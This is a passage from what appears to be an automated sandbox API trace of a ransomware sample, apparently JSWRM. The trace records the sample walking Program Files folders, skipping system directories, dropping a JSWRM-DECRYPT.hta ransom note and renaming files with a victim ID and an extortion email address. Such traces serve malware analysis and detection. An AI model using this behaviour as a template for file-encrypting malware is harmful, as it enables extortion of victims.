hHeap=0x1e0000) returned 1 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0068.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.128] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2=".") returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="..") returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="...") returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="windows") returned -1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="recovery") returned -1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="perflogs") returned -1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="documents and settings") returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="$RECYCLE.BIN") returned 1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="system volume information") returned -1 [0068.128] lstrcmpiW (lpString1="oskmenu", lpString2="msocache") returned 1 [0068.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0068.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\jswrm-decrypt.hta")) returned 0xffffffff [0068.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0068.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0068.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.130] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.130] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.131] CloseHandle (hObject=0x458) returned 1 [0068.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0068.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0068.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\jswrm-decrypt.hta")) returned 0x20 [0068.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0068.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f43e891, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232240 [0068.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.132] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f43e891, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.133] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f43e891, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f43e891, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4649c9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.134] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2=".") returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="..") returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="...") returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="windows") returned -1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="recovery") returned -1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="perflogs") returned -1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="documents and settings") returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="system volume information") returned -1 [0068.134] lstrcmpiW (lpString1="oskmenubase.xml", lpString2="msocache") returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenubase.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenubase.xml", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenubase.xml", lpUsedDefaultChar=0x0) returned 15 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenubase.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenubase.xml", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenubase.xml", lpUsedDefaultChar=0x0) returned 15 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.135] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9564342414460936) returned 0 [0068.135] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.135] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.135] CloseHandle (hObject=0xffffffff) returned 1 [0068.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x23b278 [0068.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b278 | out: hHeap=0x1e0000) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.136] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenubase.xml", cAlternateFileName="")) returned 0 [0068.136] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.136] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0068.136] lstrcmpiW (lpString1="oskmenu.xml", lpString2=".") returned 1 [0068.136] lstrcmpiW (lpString1="oskmenu.xml", lpString2="..") returned 1 [0068.136] lstrcmpiW (lpString1="oskmenu.xml", lpString2="...") returned 1 [0068.136] lstrcmpiW (lpString1="oskmenu.xml", lpString2="windows") returned -1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="recovery") returned -1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="perflogs") returned -1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="documents and settings") returned 1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="system volume information") returned -1 [0068.137] lstrcmpiW (lpString1="oskmenu.xml", lpString2="msocache") returned 1 [0068.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenu.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenu.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenu.xml", lpUsedDefaultChar=0x0) returned 11 [0068.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenu.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskmenu.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskmenu.xml", lpUsedDefaultChar=0x0) returned 11 [0068.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.137] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080975440827696) returned 0 [0068.137] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.137] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.137] CloseHandle (hObject=0xffffffff) returned 1 [0068.137] 